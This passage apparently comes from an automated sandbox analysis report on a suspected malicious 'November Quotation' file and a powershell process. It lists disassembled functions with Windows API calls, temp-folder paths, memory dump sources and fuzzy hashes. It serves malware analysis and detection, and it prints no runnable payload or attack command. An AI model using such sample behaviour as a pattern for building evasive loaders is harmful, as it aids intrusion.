                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: TextWindow
                                                                                                              • String ID: 1033$inelegancy$|ru
                                                                                                              • API String ID: 530164218-974290842
                                                                                                              • Opcode ID: 8b429be878afe7590db0d7d828af6690082b4d7ceec1e1c65437310bb6a61704
                                                                                                              • Instruction ID: 35032be21ee97317971fa14881c8fae77304ec86186b0b602806c9fee69e1f08
                                                                                                              • Opcode Fuzzy Hash: 8b429be878afe7590db0d7d828af6690082b4d7ceec1e1c65437310bb6a61704
                                                                                                              • Instruction Fuzzy Hash: 3E11C331B006119BC720DF55DC81A737BADEF8571A328817FE841A73E1DB79AD428A58
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403213,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004057F2
                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403213,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004057FC
                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 0040580E
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 2659869361-297319885
                                                                                                              • Opcode ID: de9dddfcd7a9d618380513bff0a4e880c88fc064ccebdc1c89e46d65784464cc
                                                                                                              • Instruction ID: f63ca075a24b3552cb7c5632698c0476d366f5162805e4a7ef835507e0185024
                                                                                                              • Opcode Fuzzy Hash: de9dddfcd7a9d618380513bff0a4e880c88fc064ccebdc1c89e46d65784464cc
                                                                                                              • Instruction Fuzzy Hash: 9DD05E21102E20AAD1117B849C08EDB629DEE85300340847BF500B21A1CB7819518BED
                                                                                                              APIs
                                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                              • VerQueryValueW.VERSION(?,0040A014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404258612-0
                                                                                                              • Opcode ID: 90b437ca501e41d769246acc3526ee78bfc1f7e4b716acdc87d1f01b62c577f6
                                                                                                              • Instruction ID: 985e6d37b82d88455cf37f94a5598379594e562e2ebdb1bdff2800a7dde94c7a
                                                                                                              • Opcode Fuzzy Hash: 90b437ca501e41d769246acc3526ee78bfc1f7e4b716acdc87d1f01b62c577f6
                                                                                                              • Instruction Fuzzy Hash: B6111CB1A00109AFDB01DFA5C945DAEBBB5EF45344F21417AF500F62E1E7359E40DB29
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(00000000,00000000,00402EE3,00000001,?,?,?,00000000,0040344F,?), ref: 00402D16
                                                                                                              • GetTickCount.KERNEL32 ref: 00402D34
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402D51
                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,0040344F,?), ref: 00402D5F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 2102729457-0
                                                                                                              • Opcode ID: aed48f930e6cb8163906278dd1a6a8d55546e7dcfd90fdb5b9c2cdca09a853f5
                                                                                                              • Instruction ID: 0f67fd822d339501c317f9c9290c0d88a12acd91c10ffcc8c100a5c20b21d8f0
                                                                                                              • Opcode Fuzzy Hash: aed48f930e6cb8163906278dd1a6a8d55546e7dcfd90fdb5b9c2cdca09a853f5
                                                                                                              • Instruction Fuzzy Hash: 8EF0F870603620BFC621AB64FF4DA9B7A65FB44B12B95047AF141B11E4D7B848C1CBDD
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 00404FEE
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040503F
                                                                                                                • Part of subcall function 00404032: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404044
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                                              • Instruction ID: bbda00c2ce61db54858d54f75231ff4833bc9f24808a58ee1059b1aa4c9daed2
                                                                                                              • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                                              • Instruction Fuzzy Hash: 44018F71100608AFDF318F11DD81AAF3A2AEB88354F104037FA00761D1CB7A8DA2DEA9
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F93420,004036AE,004034F0,?), ref: 004036F0
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004036F7
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004036E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 1100898210-297319885
                                                                                                              • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                                              • Instruction ID: 839bfc3724c17aac1dd4b1c492512fede4cfaa3ffa2183060c5e8c58424d678e
                                                                                                              • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                                              • Instruction Fuzzy Hash: 3AE0C233500020ABC6315F55FD0572EBB68AF4AB22F05842EE8807B3A087745C534FC8
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DD3,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 0040583E
                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DD3,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,?,00000000,0040344F), ref: 0040584E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrlen
                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                              • API String ID: 2709904686-2743851969
                                                                                                              • Opcode ID: e38c69dbf87290b844468336b4ce525dd485480a3148f7863e3f2b8cc78cabd0
                                                                                                              • Instruction ID: e3b64cc9c476cb1f3dcb5ec7b95522af912f2f782a9e9cda297630c48d1e24bd
                                                                                                              • Opcode Fuzzy Hash: e38c69dbf87290b844468336b4ce525dd485480a3148f7863e3f2b8cc78cabd0
                                                                                                              • Instruction Fuzzy Hash: 1ED05EB3401D209AD3127704DC449DF63A8EF62300746846FE940A21A0D7785C908EA9
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 00405982
                                                                                                              • lstrcmpiA.KERNEL32(00405BAC,00000000), ref: 0040599A
                                                                                                              • CharNextA.USER32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059AB
                                                                                                              • lstrlenA.KERNEL32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                                              • Instruction ID: 74db543d3a7c556463c7df328d7f28d8c713d1c7c3b841aeb09eb3bbb428cad3
                                                                                                              • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                                              • Instruction Fuzzy Hash: F4F0F632205914FFD702DFA4CE0099FBBA8EF05364B2140B9E840FB210D674DE019FA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6eff2a534836da6016b9571f1289b0ceaed7458276d8f064b1619b5a786be2f2
                                                                                                              • Instruction ID: 3c9056ca388ff246b1563a6cff1da31ee2f8f7422e2dafdc8d408572f6086770
                                                                                                              • Opcode Fuzzy Hash: 6eff2a534836da6016b9571f1289b0ceaed7458276d8f064b1619b5a786be2f2
                                                                                                              • Instruction Fuzzy Hash: 2B2157B1700316ABE73057B588007BB7AD6ABC6705F608429E907DB3D1DD75E982C3A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: '
                                                                                                              • API String ID: 0-1997036262
                                                                                                              • Opcode ID: 956938c95510d5fd643d27f54078bd592e925241c64b7066b12d3327709efa81
                                                                                                              • Instruction ID: cdf85c0d0a9df96b985de6cae9c91a06142454a1c07301ffc5088d7039b8dd14
                                                                                                              • Opcode Fuzzy Hash: 956938c95510d5fd643d27f54078bd592e925241c64b7066b12d3327709efa81
                                                                                                              • Instruction Fuzzy Hash: 3F82D4B0B102159FEB24CB65C854BAABBB2FF85304F14C0A9D50AAF351DB71DD86CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4122bc098de8fcabc68be8f34a785bc7d331e623b15a4605472505bb8474c1b6
                                                                                                              • Instruction ID: 2bfac7d85b2e8bacce878a639bdf44b4dcde50737055eeda1f3d056a18fd4d43
                                                                                                              • Opcode Fuzzy Hash: 4122bc098de8fcabc68be8f34a785bc7d331e623b15a4605472505bb8474c1b6
                                                                                                              • Instruction Fuzzy Hash: B35271B4B102159FE724CB64C950BAABBB2EB89308F14C4D5D90A9F351DB71ED82CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f76e9ecada408ac583f66f84f60a467a6ce503248f571fc923db9f8f8128d330
                                                                                                              • Instruction ID: b6d6c5e412f49a486364bb56b4c9bf5a403d56a5b5b148e46bcc9735f2e07eb7
                                                                                                              • Opcode Fuzzy Hash: f76e9ecada408ac583f66f84f60a467a6ce503248f571fc923db9f8f8128d330
                                                                                                              • Instruction Fuzzy Hash: 604241B4B102149FD724CB58C950FAAB7B2EB86305F1080D5D90AAF751CB76EE82CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a2afcfd0199029572a758221d6d337cbde4bc78660a8aa9af2eef0fc2cc169ca
                                                                                                              • Instruction ID: 3c708eca4b78316bd49fecad80b13815b5ae53e44e7311f6eff58c18478d2424
                                                                                                              • Opcode Fuzzy Hash: a2afcfd0199029572a758221d6d337cbde4bc78660a8aa9af2eef0fc2cc169ca
                                                                                                              • Instruction Fuzzy Hash: 0D3275B0B11209AFD724CBA8C464B99B7F2EF86705F148069E5069F351DB71ED82CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b834f858e9749e8cb8c7d840838c4f8a5593af54546ee479b37d95a79bfa4633
                                                                                                              • Instruction ID: 531b4e9b2b4415291eae030538a03797598e6670032ec110a7fee75006fa89ab
                                                                                                              • Opcode Fuzzy Hash: b834f858e9749e8cb8c7d840838c4f8a5593af54546ee479b37d95a79bfa4633
                                                                                                              • Instruction Fuzzy Hash: 422242B0B103149FD724DB58C954FAABBB2EB86305F108099D909AF751CB76ED82CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 51d13e767a4685c4eaec332fbe36131515fd28c79960cfc632feab86db7364f9
                                                                                                              • Instruction ID: 8d009b7b25ffd5a4ab7182f577e05804b4db3ffea851caa1591ab41374d98bfd
                                                                                                              • Opcode Fuzzy Hash: 51d13e767a4685c4eaec332fbe36131515fd28c79960cfc632feab86db7364f9
                                                                                                              • Instruction Fuzzy Hash: 252271B0B102149FE724CB64C954BAABBB2EF89304F10C495D90AAF351DB71ED86CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24bb1fc04c4016e43084598fa4e29756f74c2263092b5f52554da9d707bf6676
                                                                                                              • Instruction ID: 3d1c5d244f5e0733241be176e3a05f0b6c07428cb9f4872a7d6b1303778534f4
                                                                                                              • Opcode Fuzzy Hash: 24bb1fc04c4016e43084598fa4e29756f74c2263092b5f52554da9d707bf6676
                                                                                                              • Instruction Fuzzy Hash: 871251B4B103149FD724CB58C954FAAB7B2EB86305F108095E90AAF751CB76ED82CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 888ccee48bde9bbb07f1f9d9c00e5d3bd1a11763a19e0573b61b4b4502a8f1d7
                                                                                                              • Instruction ID: 31314b69aac3fb11f002314f069a3e05389bb5898c990792af02aa45e3dad4e2
                                                                                                              • Opcode Fuzzy Hash: 888ccee48bde9bbb07f1f9d9c00e5d3bd1a11763a19e0573b61b4b4502a8f1d7
                                                                                                              • Instruction Fuzzy Hash: 06021E75A01609DFDB15CFA8D584AADBBB2FF88320F258159E805AB365CB31ED41CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4526c7eeccc8a43bf91f4d812e24cd6e0d3eaed2682c3a2894cf80d8d517fb92
                                                                                                              • Instruction ID: 773f33468cb2cdadac248bb929a6b12c40841e8473c23c92b421ce6d076d9ace
                                                                                                              • Opcode Fuzzy Hash: 4526c7eeccc8a43bf91f4d812e24cd6e0d3eaed2682c3a2894cf80d8d517fb92
                                                                                                              • Instruction Fuzzy Hash: F0024DB4B11208EFD724CB98C564BA9B7B2FF86305F158055E906AF351C772ED82CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ba7456b7235244929876b3bc59bd54f8d5d02c48b469c65120bf2b7bd560b4d4
                                                                                                              • Instruction ID: 63f1e629eeb791bbe10494c58483c4ed097cc2b2ae9aef90ecf1775065c53073
                                                                                                              • Opcode Fuzzy Hash: ba7456b7235244929876b3bc59bd54f8d5d02c48b469c65120bf2b7bd560b4d4
                                                                                                              • Instruction Fuzzy Hash: 25E1C2B0B102059FEB24DBA4C454BAEBBB2AF89704F14C469D5026F356DF71ED82CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
